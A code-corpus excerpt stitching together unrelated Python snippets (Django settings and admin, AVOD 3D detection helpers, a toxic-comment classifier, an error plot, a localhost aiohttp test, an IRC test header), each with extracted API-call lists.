] | [((43, 56), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (54, 56), False, 'from dotenv import load_dotenv\n'), ((251, 276), 'os.getenv', 'os.getenv', (['"""MYSQL"""', '(False)'], {}), "('MYSQL', False)\n", (260, 276), False, 'import os\n'), ((102, 127), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (117, 127), False, 'import os\n'), ((659, 695), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (671, 695), False, 'import os\n')] |
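A sketch of how `get_db_config()` would typically be consumed from a project's `settings.py`; the module name `db_config` is an assumption, since the real import path of the file above is not shown. One caveat worth noting: `bool()` of any non-empty string is truthy, so `MYSQL=0` in the environment would still select MySQL — comparing the raw string is the usual fix, also sketched below.

# --- usage sketch (module name `db_config` is assumed) ---
# settings.py
import os
from db_config import get_db_config

DATABASES = get_db_config()

# stricter reading of the env flag discussed above:
USE_MYSQL = os.getenv("MYSQL", "false").lower() in ("1", "true", "yes")
# --- end sketch ---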
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import UserProfile
admin.site.register(UserProfile)
| [
"django.contrib.admin.site.register"
] | [((132, 164), 'django.contrib.admin.site.register', 'admin.site.register', (['UserProfile'], {}), '(UserProfile)\n', (151, 164), False, 'from django.contrib import admin\n')] |
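For completeness, the decorator form of the same registration, which also gives column control in the changelist; the `list_display` field names are hypothetical, since `UserProfile`'s fields are not shown here, and this would replace (not accompany) the plain `register` call above:

# --- alternative registration sketch (hypothetical field names) ---
from django.contrib import admin
from .models import UserProfile

@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
    list_display = ("id", "user")
# --- end sketch ---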
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import copy
import numpy as np
import tensorflow as tf
from wavedata.tools.obj_detection import obj_utils
from wavedata.tools.obj_detection import evaluation
from avod.core import anchor_projector
from avod.core import box_3d_encoder
COLOUR_SCHEME_PREDICTIONS = {
"Easy GT": (255, 255, 0), # Yellow
"Medium GT": (255, 128, 0), # Orange
"Hard GT": (255, 0, 0), # Red
"Prediction": (50, 255, 50), # Green
}
def get_gts_based_on_difficulty(dataset, img_idx):
"""Returns lists of ground-truth based on difficulty.
"""
# Get all ground truth labels
all_gt_objs = obj_utils.read_labels(dataset.label_dir, img_idx)
# Filter to dataset classes
gt_objs = dataset.kitti_utils.filter_labels(all_gt_objs)
# Filter objects to desired difficulty
easy_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=0)
medium_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=1)
hard_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=2)
for gt_obj in easy_gt_objs:
gt_obj.type = 'Easy GT'
for gt_obj in medium_gt_objs:
gt_obj.type = 'Medium GT'
for gt_obj in hard_gt_objs:
gt_obj.type = 'Hard GT'
return easy_gt_objs, medium_gt_objs, hard_gt_objs, all_gt_objs
def get_max_ious_3d(all_gt_boxes_3d, pred_boxes_3d):
"""Helper function to calculate 3D IoU for the given predictions.
Args:
all_gt_boxes_3d: A list of the same ground-truth boxes in box_3d
format.
pred_boxes_3d: A list of predictions in box_3d format.
"""
# Only calculate ious if there are predictions
if pred_boxes_3d:
# Convert to iou format
gt_objs_iou_fmt = box_3d_encoder.box_3d_to_3d_iou_format(
all_gt_boxes_3d)
pred_objs_iou_fmt = box_3d_encoder.box_3d_to_3d_iou_format(
pred_boxes_3d)
max_ious_3d = np.zeros(len(all_gt_boxes_3d))
for gt_obj_idx in range(len(all_gt_boxes_3d)):
gt_obj_iou_fmt = gt_objs_iou_fmt[gt_obj_idx]
ious_3d = evaluation.three_d_iou(gt_obj_iou_fmt,
pred_objs_iou_fmt)
max_ious_3d[gt_obj_idx] = np.amax(ious_3d)
else:
# No detections, all ious = 0
max_ious_3d = np.zeros(len(all_gt_boxes_3d))
return max_ious_3d
def tf_project_to_image_space(anchors, calib_p2, image_shape, img_idx):
"""Helper function to convert data to tensors and project
to image space using the tf projection function.
"""
anchors_tensor = tf.convert_to_tensor(anchors, tf.float32)
calib_p2_tensor = tf.convert_to_tensor(calib_p2, tf.float32)
image_shape_tensor = tf.convert_to_tensor(image_shape, tf.float32)
projected_boxes_tensor, _ = \
anchor_projector.tf_project_to_image_space(
anchors_tensor,
calib_p2_tensor,
image_shape_tensor)
sess = tf.Session(config=npu_config_proto())
with sess.as_default():
projected_boxes = projected_boxes_tensor.eval()
return projected_boxes
| [
"wavedata.tools.obj_detection.obj_utils.read_labels",
"avod.core.anchor_projector.tf_project_to_image_space",
"avod.core.box_3d_encoder.box_3d_to_3d_iou_format",
"wavedata.tools.obj_detection.evaluation.three_d_iou",
"copy.deepcopy",
"tensorflow.convert_to_tensor",
"numpy.amax"
] | [((1925, 1974), 'wavedata.tools.obj_detection.obj_utils.read_labels', 'obj_utils.read_labels', (['dataset.label_dir', 'img_idx'], {}), '(dataset.label_dir, img_idx)\n', (1946, 1974), False, 'from wavedata.tools.obj_detection import obj_utils\n'), ((3972, 4013), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['anchors', 'tf.float32'], {}), '(anchors, tf.float32)\n', (3992, 4013), True, 'import tensorflow as tf\n'), ((4036, 4078), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['calib_p2', 'tf.float32'], {}), '(calib_p2, tf.float32)\n', (4056, 4078), True, 'import tensorflow as tf\n'), ((4104, 4149), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image_shape', 'tf.float32'], {}), '(image_shape, tf.float32)\n', (4124, 4149), True, 'import tensorflow as tf\n'), ((4193, 4292), 'avod.core.anchor_projector.tf_project_to_image_space', 'anchor_projector.tf_project_to_image_space', (['anchors_tensor', 'calib_p2_tensor', 'image_shape_tensor'], {}), '(anchors_tensor, calib_p2_tensor,\n image_shape_tensor)\n', (4235, 4292), False, 'from avod.core import anchor_projector\n'), ((2175, 2197), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2188, 2197), False, 'import copy\n'), ((2277, 2299), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2290, 2299), False, 'import copy\n'), ((2377, 2399), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2390, 2399), False, 'import copy\n'), ((3112, 3167), 'avod.core.box_3d_encoder.box_3d_to_3d_iou_format', 'box_3d_encoder.box_3d_to_3d_iou_format', (['all_gt_boxes_3d'], {}), '(all_gt_boxes_3d)\n', (3150, 3167), False, 'from avod.core import box_3d_encoder\n'), ((3209, 3262), 'avod.core.box_3d_encoder.box_3d_to_3d_iou_format', 'box_3d_encoder.box_3d_to_3d_iou_format', (['pred_boxes_3d'], {}), '(pred_boxes_3d)\n', (3247, 3262), False, 'from avod.core import box_3d_encoder\n'), ((3466, 3523), 'wavedata.tools.obj_detection.evaluation.three_d_iou', 'evaluation.three_d_iou', (['gt_obj_iou_fmt', 'pred_objs_iou_fmt'], {}), '(gt_obj_iou_fmt, pred_objs_iou_fmt)\n', (3488, 3523), False, 'from wavedata.tools.obj_detection import evaluation\n'), ((3608, 3624), 'numpy.amax', 'np.amax', (['ious_3d'], {}), '(ious_3d)\n', (3615, 3624), True, 'import numpy as np\n')] |
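The loop in `get_max_ious_3d` reduces each ground-truth box's row of the GT-by-prediction IoU matrix to its best match with `np.amax`. A self-contained toy of that reduction using 1-D intervals in place of 3-D boxes (the real `evaluation.three_d_iou` is not reproduced here):

# --- toy illustration of the per-GT max-IoU reduction (1-D intervals instead of 3-D boxes) ---
import numpy as np

def interval_iou(a, bs):
    """IoU of interval a=(lo, hi) against an array of intervals bs, vectorised."""
    inter = np.clip(np.minimum(a[1], bs[:, 1]) - np.maximum(a[0], bs[:, 0]), 0, None)
    union = (a[1] - a[0]) + (bs[:, 1] - bs[:, 0]) - inter
    return inter / union

gt_boxes = np.array([[0.0, 2.0], [5.0, 6.0]])
pred_boxes = np.array([[1.0, 2.0], [0.0, 1.0], [5.5, 7.0]])

max_ious = np.zeros(len(gt_boxes))
for gt_idx in range(len(gt_boxes)):            # same structure as the loop above
    max_ious[gt_idx] = np.amax(interval_iou(gt_boxes[gt_idx], pred_boxes))
print(max_ious)                                # -> [0.5  0.25]
# --- end illustration ---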
# Importing the Libraries
import pandas as pd
import numpy as np
import re, string
import swifter
from nltk.corpus import stopwords
stop_words = set(stopwords.words("english"))
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
from sklearn.linear_model import LogisticRegression
from scipy.sparse import hstack
import joblib
import warnings
warnings.filterwarnings("ignore")
# Importing the training dataset
train_df = pd.read_csv("../input/toxic-data/train.csv")
# Importing the test data
test_data = pd.read_csv("../input/toxic-data/test.csv")
test_labels = pd.read_csv("../input/toxic-data/test_labels.csv")
# Merging the two datasets above for complete test data
test_df = pd.merge(test_data, test_labels, on="id")
test_df.head()
# Filtering out the samples having actual target labels
new_test_df = test_df[(test_df['toxic']!=-1) & (test_df['severe_toxic']!=-1) & (test_df['obscene']!=-1) &
(test_df['threat']!=-1) & (test_df['insult']!=-1) & (test_df['identity_hate']!=-1)]
new_test_df.reset_index(drop=True, inplace=True)
new_test_df.head()
# Creating a function to clean the training dataset
def clean_text(text):
"""This function will take text as input and return a cleaned text
by removing html char, punctuations, non-letters, newline and converting it
to lower case.
"""
# Converting to lower case letters
text = text.lower()
# Removing the contraction of few words
text = re.sub(r"what's", "what is ", text)
text = re.sub(r"\'s", " ", text)
text = re.sub(r"\'ve", " have ", text)
text = re.sub(r"can't", "can not ", text)
text = re.sub(r"n't", " not ", text)
text = re.sub(r"i'm", "i am ", text)
text = re.sub(r"\'re", " are ", text)
text = re.sub(r"\'d", " would ", text)
text = re.sub(r"\'ll", " will ", text)
text = re.sub(r"\'scuse", " excuse ", text)
# Replacing the HTMl characters with " "
text = re.sub("<.*?>", " ", text)
# Removing the punctuations
text = text.translate(str.maketrans(" ", " ", string.punctuation))
# Removing non-letters
text = re.sub("[^a-zA-Z]", " ", text)
# Replacing newline with space
text = re.sub("\n", " ", text)
# Split on space and rejoin to remove extra spaces
text = " ".join(text.split())
return text
def word_lemmatizer(text):
"""This function will help lemmatize words in a text.
"""
lemmatizer = WordNetLemmatizer()
# Tokenize the sentences to words
text = word_tokenize(text)
# Removing the stop words
text = [lemmatizer.lemmatize(word) for word in text]
# Joining the cleaned list
text = " ".join(text)
return text
# Cleaning and preprocessing the train data
train_df["comment_text"] = train_df["comment_text"].swifter.apply(clean_text)
train_df["comment_text"] = train_df["comment_text"].swifter.apply(word_lemmatizer)
# Cleaning and preprocessing the test data
new_test_df["comment_text"] = new_test_df["comment_text"].swifter.apply(clean_text)
new_test_df["comment_text"] = new_test_df["comment_text"].swifter.apply(word_lemmatizer)
# Performing the train-val split to create training and validation datasets
train, validation = train_test_split(train_df, test_size=0.2, random_state=42)
# print(X_train.shape, X_val.shape, y_train.shape, y_val.shape)
print(train.shape, validation.shape)
# Seperating our input and target variable columns
X_train = train.comment_text
X_val = validation.comment_text
X_test = new_test_df.comment_text
# Storing our target labels list in a variable
labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
# Creating a unigram TFIDF vectorizer and transforming all our input features
word_tfidf = TfidfVectorizer(max_features=5000, ngram_range=(1, 1), sublinear_tf=True, strip_accents="unicode",
analyzer="word",token_pattern=r"\w{1,}", stop_words=stop_words)
word_tfidf.fit(train_df.comment_text)
train_word_tfidf = word_tfidf.transform(X_train)
val_word_tfidf = word_tfidf.transform(X_val)
test_word_tfidf = word_tfidf.transform(X_test)
# Creating a char n-gram (2, 6) TFIDF vectorizer and transforming all our input features
char_tfidf = TfidfVectorizer(max_features=30000, ngram_range=(2, 6), sublinear_tf=True, strip_accents="unicode",
analyzer="char", stop_words=stop_words)
char_tfidf.fit(train_df.comment_text)
train_char_tfidf = char_tfidf.transform(X_train)
val_char_tfidf = char_tfidf.transform(X_val)
test_char_tfidf = char_tfidf.transform(X_test)
# Concatenating both unigram and n-gram features for our training input
train_features = hstack([train_word_tfidf, train_char_tfidf])
val_features = hstack([val_word_tfidf, val_char_tfidf])
test_features = hstack([test_word_tfidf, test_char_tfidf])
# Saving the tfidf vectors for future use
joblib.dump(word_tfidf, "word_tfidf_vectorizer.pkl")
joblib.dump(char_tfidf, "char_tfidf_vectorizer.pkl")
# Creating a logistic regression Model and treating each target as a binary classification problem
lr_model = OneVsRestClassifier(LogisticRegression(solver="saga"))
val_results = {"Accuracy": {}, "F1 Score": {}}
test_results = {"Accuracy": {}, "F1 Score": {}}
for label in labels:
print(f"... Processing {label}")
# train the model using X & y
lr_model.fit(train_features, train[label])
# Predicting the validation data labels
val_prediction = lr_model.predict(val_features)
# Predicting the test data labels
test_prediction = lr_model.predict(test_features)
# Saving the model based on target label
joblib.dump(lr_model, f"logistic_regression_{label}.pkl")
# Checking and model's accuracy and f1-score
val_results["Accuracy"][f"{label}"] = accuracy_score(validation[label], val_prediction)
val_results["F1 Score"][f"{label}"] = f1_score(validation[label], val_prediction, average = "weighted")
test_results["Accuracy"][f"{label}"] = accuracy_score(new_test_df[label], test_prediction)
test_results["F1 Score"][f"{label}"] = f1_score(new_test_df[label], test_prediction, average = "weighted")
| [
"sklearn.metrics.accuracy_score",
"sklearn.metrics.f1_score",
"nltk.corpus.stopwords.words",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"pandas.merge",
"nltk.stem.WordNetLemmatizer",
"nltk.tokenize.word_tokenize",
"sklearn.linear_model.LogisticRegression",
"sklearn.feature_extraction.text.TfidfVectorizer",
"scipy.sparse.hstack",
"re.sub",
"joblib.dump",
"warnings.filterwarnings"
] | [((603, 636), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (626, 636), False, 'import warnings\n'), ((682, 726), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/train.csv"""'], {}), "('../input/toxic-data/train.csv')\n", (693, 726), True, 'import pandas as pd\n'), ((766, 809), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/test.csv"""'], {}), "('../input/toxic-data/test.csv')\n", (777, 809), True, 'import pandas as pd\n'), ((824, 874), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/test_labels.csv"""'], {}), "('../input/toxic-data/test_labels.csv')\n", (835, 874), True, 'import pandas as pd\n'), ((942, 983), 'pandas.merge', 'pd.merge', (['test_data', 'test_labels'], {'on': '"""id"""'}), "(test_data, test_labels, on='id')\n", (950, 983), True, 'import pandas as pd\n'), ((3454, 3512), 'sklearn.model_selection.train_test_split', 'train_test_split', (['train_df'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(train_df, test_size=0.2, random_state=42)\n', (3470, 3512), False, 'from sklearn.model_selection import train_test_split\n'), ((3984, 4155), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'max_features': '(5000)', 'ngram_range': '(1, 1)', 'sublinear_tf': '(True)', 'strip_accents': '"""unicode"""', 'analyzer': '"""word"""', 'token_pattern': '"""\\\\w{1,}"""', 'stop_words': 'stop_words'}), "(max_features=5000, ngram_range=(1, 1), sublinear_tf=True,\n strip_accents='unicode', analyzer='word', token_pattern='\\\\w{1,}',\n stop_words=stop_words)\n", (3999, 4155), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((4461, 4604), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'max_features': '(30000)', 'ngram_range': '(2, 6)', 'sublinear_tf': '(True)', 'strip_accents': '"""unicode"""', 'analyzer': '"""char"""', 'stop_words': 'stop_words'}), "(max_features=30000, ngram_range=(2, 6), sublinear_tf=True,\n strip_accents='unicode', analyzer='char', stop_words=stop_words)\n", (4476, 4604), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((4902, 4946), 'scipy.sparse.hstack', 'hstack', (['[train_word_tfidf, train_char_tfidf]'], {}), '([train_word_tfidf, train_char_tfidf])\n', (4908, 4946), False, 'from scipy.sparse import hstack\n'), ((4962, 5002), 'scipy.sparse.hstack', 'hstack', (['[val_word_tfidf, val_char_tfidf]'], {}), '([val_word_tfidf, val_char_tfidf])\n', (4968, 5002), False, 'from scipy.sparse import hstack\n'), ((5019, 5061), 'scipy.sparse.hstack', 'hstack', (['[test_word_tfidf, test_char_tfidf]'], {}), '([test_word_tfidf, test_char_tfidf])\n', (5025, 5061), False, 'from scipy.sparse import hstack\n'), ((5105, 5157), 'joblib.dump', 'joblib.dump', (['word_tfidf', '"""word_tfidf_vectorizer.pkl"""'], {}), "(word_tfidf, 'word_tfidf_vectorizer.pkl')\n", (5116, 5157), False, 'import joblib\n'), ((5158, 5210), 'joblib.dump', 'joblib.dump', (['char_tfidf', '"""char_tfidf_vectorizer.pkl"""'], {}), "(char_tfidf, 'char_tfidf_vectorizer.pkl')\n", (5169, 5210), False, 'import joblib\n'), ((149, 175), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (164, 175), False, 'from nltk.corpus import stopwords\n'), ((1709, 1743), 're.sub', 're.sub', (['"""what\'s"""', '"""what is """', 'text'], {}), '("what\'s", \'what is \', text)\n', (1715, 1743), False, 'import re, string\n'), ((1756, 1781), 're.sub', 're.sub', (['"""\\\\\'s"""', '""" """', 'text'], {}), '("\\\\\'s", \' 
\', text)\n', (1762, 1781), False, 'import re, string\n'), ((1793, 1824), 're.sub', 're.sub', (['"""\\\\\'ve"""', '""" have """', 'text'], {}), '("\\\\\'ve", \' have \', text)\n', (1799, 1824), False, 'import re, string\n'), ((1836, 1869), 're.sub', 're.sub', (['"""can\'t"""', '"""can not """', 'text'], {}), '("can\'t", \'can not \', text)\n', (1842, 1869), False, 'import re, string\n'), ((1882, 1910), 're.sub', 're.sub', (['"""n\'t"""', '""" not """', 'text'], {}), '("n\'t", \' not \', text)\n', (1888, 1910), False, 'import re, string\n'), ((1923, 1951), 're.sub', 're.sub', (['"""i\'m"""', '"""i am """', 'text'], {}), '("i\'m", \'i am \', text)\n', (1929, 1951), False, 'import re, string\n'), ((1964, 1994), 're.sub', 're.sub', (['"""\\\\\'re"""', '""" are """', 'text'], {}), '("\\\\\'re", \' are \', text)\n', (1970, 1994), False, 'import re, string\n'), ((2006, 2037), 're.sub', 're.sub', (['"""\\\\\'d"""', '""" would """', 'text'], {}), '("\\\\\'d", \' would \', text)\n', (2012, 2037), False, 'import re, string\n'), ((2049, 2080), 're.sub', 're.sub', (['"""\\\\\'ll"""', '""" will """', 'text'], {}), '("\\\\\'ll", \' will \', text)\n', (2055, 2080), False, 'import re, string\n'), ((2092, 2128), 're.sub', 're.sub', (['"""\\\\\'scuse"""', '""" excuse """', 'text'], {}), '("\\\\\'scuse", \' excuse \', text)\n', (2098, 2128), False, 'import re, string\n'), ((2185, 2211), 're.sub', 're.sub', (['"""<.*?>"""', '""" """', 'text'], {}), "('<.*?>', ' ', text)\n", (2191, 2211), False, 'import re, string\n'), ((2353, 2383), 're.sub', 're.sub', (['"""[^a-zA-Z]"""', '""" """', 'text'], {}), "('[^a-zA-Z]', ' ', text)\n", (2359, 2383), False, 'import re, string\n'), ((2430, 2453), 're.sub', 're.sub', (['"""\n"""', '""" """', 'text'], {}), "('\\n', ' ', text)\n", (2436, 2453), False, 'import re, string\n'), ((2680, 2699), 'nltk.stem.WordNetLemmatizer', 'WordNetLemmatizer', ([], {}), '()\n', (2697, 2699), False, 'from nltk.stem import WordNetLemmatizer\n'), ((2749, 2768), 'nltk.tokenize.word_tokenize', 'word_tokenize', (['text'], {}), '(text)\n', (2762, 2768), False, 'from nltk.tokenize import word_tokenize\n'), ((5342, 5375), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'solver': '"""saga"""'}), "(solver='saga')\n", (5360, 5375), False, 'from sklearn.linear_model import LogisticRegression\n'), ((5849, 5906), 'joblib.dump', 'joblib.dump', (['lr_model', 'f"""logistic_regression_{label}.pkl"""'], {}), "(lr_model, f'logistic_regression_{label}.pkl')\n", (5860, 5906), False, 'import joblib\n'), ((5998, 6047), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['validation[label]', 'val_prediction'], {}), '(validation[label], val_prediction)\n', (6012, 6047), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6090, 6153), 'sklearn.metrics.f1_score', 'f1_score', (['validation[label]', 'val_prediction'], {'average': '"""weighted"""'}), "(validation[label], val_prediction, average='weighted')\n", (6098, 6153), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6199, 6250), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['new_test_df[label]', 'test_prediction'], {}), '(new_test_df[label], test_prediction)\n', (6213, 6250), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6294, 6359), 'sklearn.metrics.f1_score', 'f1_score', (['new_test_df[label]', 'test_prediction'], {'average': '"""weighted"""'}), "(new_test_df[label], test_prediction, average='weighted')\n", (6302, 6359), False, 'from 
sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n')] |
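Because the two vectorizers and one fitted model per label are persisted with joblib, inference on a new comment can be sketched as below. Assumptions: the `.pkl` files from the run above sit in the working directory, and the same `clean_text`/`word_lemmatizer` helpers are importable so the preprocessing matches training.

# --- inference sketch reusing the artifacts saved above (paths and helpers assumed) ---
import joblib
from scipy.sparse import hstack

labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
word_tfidf = joblib.load("word_tfidf_vectorizer.pkl")
char_tfidf = joblib.load("char_tfidf_vectorizer.pkl")
models = {label: joblib.load(f"logistic_regression_{label}.pkl") for label in labels}

def predict_comment(raw_text):
    text = word_lemmatizer(clean_text(raw_text))   # same preprocessing as training
    feats = hstack([word_tfidf.transform([text]), char_tfidf.transform([text])])
    return {label: int(models[label].predict(feats)[0]) for label in labels}

print(predict_comment("thank you for the helpful edit"))
# --- end sketch ---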
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import csv
import sys
sys.path.append("..\\..\\libraries")
from GraphicLibrary import drawPoint, drawCircle, initDrawing, finishDrawing
from GeometryLibrary import getPoint, angle_radians
filename = "out-dist-0,40m_B-complete.txt"
# Lade Daten
data = list()
with open(filename) as csvDataFile:
csvReader = csv.reader(csvDataFile, delimiter=';')
for row in csvReader:
data.append(row)
data = data[1:]
# Stelle Ergebnisse da
initDrawing(figsize=(16,8))
import matplotlib.cm as cm
from matplotlib.colors import Normalize
cmap = cm.Reds #cm.autumn
norm = Normalize(vmin=0, vmax=1)
error1 = list()
error2 = list()
for d in data:
error1.append(float(d[7]))
error2.append(float(d[11]))
errmax1 = np.max(error1)
errmax2 = np.max(error2)
plt.subplot(1,2,1)
plt.grid()
for d in data:
dist = float(d[0])
angl = float(d[1])
distError = float(d[7])
relError = distError/dist
point = getPoint(dist*np.sin(angle_radians(angl)),dist*np.cos(angle_radians(angl)))
plt.scatter(point[0], point[1], s=1000*distError/errmax1, c="Black")
#plt.colorbar()
plt.subplot(1,2,2)
plt.grid()
for d in data:
dist = float(d[0])
angl = float(d[1])
anglError = float(d[11])
point = getPoint(dist*np.sin(angle_radians(angl)),dist*np.cos(angle_radians(angl)))
plt.scatter(point[0], point[1], s=1000*anglError/errmax2, c="Black")
#plt.colorbar()
| [
"matplotlib.pyplot.grid",
"GeometryLibrary.angle_radians",
"numpy.max",
"GraphicLibrary.initDrawing",
"matplotlib.colors.Normalize",
"csv.reader",
"matplotlib.pyplot.scatter",
"sys.path.append",
"matplotlib.pyplot.subplot"
] | [((98, 134), 'sys.path.append', 'sys.path.append', (['"""..\\\\..\\\\libraries"""'], {}), "('..\\\\..\\\\libraries')\n", (113, 134), False, 'import sys\n'), ((526, 554), 'GraphicLibrary.initDrawing', 'initDrawing', ([], {'figsize': '(16, 8)'}), '(figsize=(16, 8))\n', (537, 554), False, 'from GraphicLibrary import drawPoint, drawCircle, initDrawing, finishDrawing\n'), ((655, 680), 'matplotlib.colors.Normalize', 'Normalize', ([], {'vmin': '(0)', 'vmax': '(1)'}), '(vmin=0, vmax=1)\n', (664, 680), False, 'from matplotlib.colors import Normalize\n'), ((802, 816), 'numpy.max', 'np.max', (['error1'], {}), '(error1)\n', (808, 816), True, 'import numpy as np\n'), ((827, 841), 'numpy.max', 'np.max', (['error2'], {}), '(error2)\n', (833, 841), True, 'import numpy as np\n'), ((843, 863), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (854, 863), True, 'import matplotlib.pyplot as plt\n'), ((862, 872), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (870, 872), True, 'import matplotlib.pyplot as plt\n'), ((1170, 1190), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (1181, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1189, 1199), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (1197, 1199), True, 'import matplotlib.pyplot as plt\n'), ((392, 430), 'csv.reader', 'csv.reader', (['csvDataFile'], {'delimiter': '""";"""'}), "(csvDataFile, delimiter=';')\n", (402, 430), False, 'import csv\n'), ((1084, 1156), 'matplotlib.pyplot.scatter', 'plt.scatter', (['point[0]', 'point[1]'], {'s': '(1000 * distError / errmax1)', 'c': '"""Black"""'}), "(point[0], point[1], s=1000 * distError / errmax1, c='Black')\n", (1095, 1156), True, 'import matplotlib.pyplot as plt\n'), ((1382, 1454), 'matplotlib.pyplot.scatter', 'plt.scatter', (['point[0]', 'point[1]'], {'s': '(1000 * anglError / errmax2)', 'c': '"""Black"""'}), "(point[0], point[1], s=1000 * anglError / errmax2, c='Black')\n", (1393, 1454), True, 'import matplotlib.pyplot as plt\n'), ((1025, 1044), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1038, 1044), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1058, 1077), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1071, 1077), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1323, 1342), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1336, 1342), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1356, 1375), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1369, 1375), False, 'from GeometryLibrary import getPoint, angle_radians\n')] |
#!/usr/bin/env python3
import json
import asyncio
import aiohttp
async def req():
resp = await aiohttp.ClientSession().request(
#"get", 'http://localhost:8088/api/v1/links/1',
"get", 'http://localhost:8088/api/v1/links/1',
#data=json.dumps({"domain": "http://google.com", "action": "Links"}),
headers={"content-type": "application/json"})
print(str(resp))
print(await resp.text())
assert 200 == resp.status
async def req2():
resp = await aiohttp.ClientSession().request(
"get", 'http://localhost:8088/api/v1/domains',
headers={"content-type": "application/json"})
print(str(resp))
print(await resp.text())
assert 200 == resp.status
asyncio.get_event_loop().run_until_complete(req())
asyncio.get_event_loop().run_until_complete(req2())
| [
"aiohttp.ClientSession",
"asyncio.get_event_loop"
] | [((717, 741), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (739, 741), False, 'import asyncio\n'), ((769, 793), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (791, 793), False, 'import asyncio\n'), ((101, 124), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (122, 124), False, 'import aiohttp\n'), ((493, 516), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (514, 516), False, 'import aiohttp\n')] |
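The requests above create a new `ClientSession` per call and never close it, which aiohttp reports as an unclosed-session warning. The context-manager form below avoids that; it targets the same local endpoint as the test, so it is only runnable while that service is up.

# --- context-manager variant of the same GET (same local endpoint as above) ---
import asyncio
import aiohttp

async def req_links():
    async with aiohttp.ClientSession() as session:
        async with session.get('http://localhost:8088/api/v1/links/1',
                               headers={"content-type": "application/json"}) as resp:
            print(str(resp))
            print(await resp.text())
            assert 200 == resp.status

asyncio.run(req_links())
# --- end sketch ---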
"""
`Ergo <https://ergo.chat/>`_-specific tests of non-Unicode filtering
TODO: turn this into a test of `IRCv3 UTF8ONLY
<https://ircv3.net/specs/extensions/utf8-only>`_
"""
from irctest import cases
from irctest.patma import ANYSTR
